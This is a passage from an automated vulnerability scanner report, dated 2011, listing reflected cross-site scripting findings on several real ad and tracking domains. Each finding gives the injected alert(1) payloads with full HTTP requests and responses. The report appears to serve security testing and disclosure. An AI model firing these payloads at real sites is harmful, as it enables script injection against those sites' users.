c/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 13:59:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 13:59:33 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:32 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "B087254FEC0<SCRIPT>ALERT(1)</SCRIPT>53371E24C20" was not recognized.
*/

3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cb81'-alert(1)-'b8e98f3c48c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune6cb81'-alert(1)-'b8e98f3c48c/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:40 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:40 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:40 GMT
Content-Length: 8511

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-31746490_1304949580","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune6cb81'-alert(1)-'b8e98f3c48c&size=300x600&imp_id=cm-31746490_1304949580,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doublecli
...[SNIP]...

3.62. http://mf.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78a8'%3balert(1)//00e601315 was submitted in the h parameter. This input was echoed as a78a8';alert(1)//00e601315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728&h=90a78a8'%3balert(1)//00e601315&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 825
Date: Mon, 09 May 2011 14:05:20 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="90a78a8';alert(1)//00e601315" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.63. http://mf.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e518d"%3balert(1)//a5aa06a04d8 was submitted in the pid parameter. This input was echoed as e518d";alert(1)//a5aa06a04d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16e518d"%3balert(1)//a5aa06a04d8&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:04:58 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16e518d";alert(1)//a5aa06a04d8&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAc
...[SNIP]...

3.64. http://mf.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef2c1'%3balert(1)//7221dd363f9 was submitted in the w parameter. This input was echoed as ef2c1';alert(1)//7221dd363f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728ef2c1'%3balert(1)//7221dd363f9&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:05:08 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728ef2c1';alert(1)//7221dd363f9" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.65. http://odb.outbrain.com/utils/odb [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b69c3<script>alert(1)</script>e2bfb5961ba was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:59 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: recs="FV47GVeXRORHPpgXLLfd98jd++c7SuJ1jsmR0F2fogHZ8/NhA+/K2Td+Ksz08zkobEEsJhOBOBs="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:59 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 4052

GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1c635d46d8c496585f548332cbeac0c0'},'score':{'preferred':'average','personal':{'score'
...[SNIP]...

3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /124044/2cda0cc53888bd4bde08b06faa4b2d81

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 957ed<script>alert(1)</script>ba18c99c1cd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /124044/2cda0cc53888bd4bde08b06faa4b2d81?callback=BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd&cb=3766 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3582
Expires: Mon, 09 May 2011 15:06:42 GMT
Date: Mon, 09 May 2011 14:07:00 GMT
Connection: close

BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd(0);

3.67. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab5a"><script>alert(1)</script>ac6ea673d6b was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
